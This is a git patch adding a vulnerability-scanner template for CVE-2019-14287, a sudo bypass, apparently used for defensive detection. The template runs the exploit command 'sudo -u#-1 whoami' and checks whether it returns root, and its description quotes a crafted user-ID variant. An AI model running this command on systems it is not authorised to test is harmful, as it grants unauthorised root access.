From 52476dbaf27f56c280e74ee0307d0fe64ddede36 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 29 Dec 2023 18:47:50 +0530 Subject: [PATCH] Create CVE-2019-14287.yaml --- code/cves/2019/CVE-2019-14287.yaml | 38 ++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 code/cves/2019/CVE-2019-14287.yaml diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml new file mode 100644 index 0000000000..bf98d33e97 --- /dev/null +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-14287 + +info: + name: Sudo <= 1.8.27 - Security Bypass + author: daffainfo + severity: high + description: | + In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287 + - https://www.exploit-db.com/exploits/47502 + metadata: + verified: true + max-request: 2 + vendor: canonical + product: ubuntu_linux + tags: cve,cve2019,sudo,code,linux,privesc,local + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + sudo -u#-1 whoami + + matchers: + - type: dsl + dsl: + - '!contains(code_1_response, "root")' + - 'contains(code_2_response, "root")' + condition: and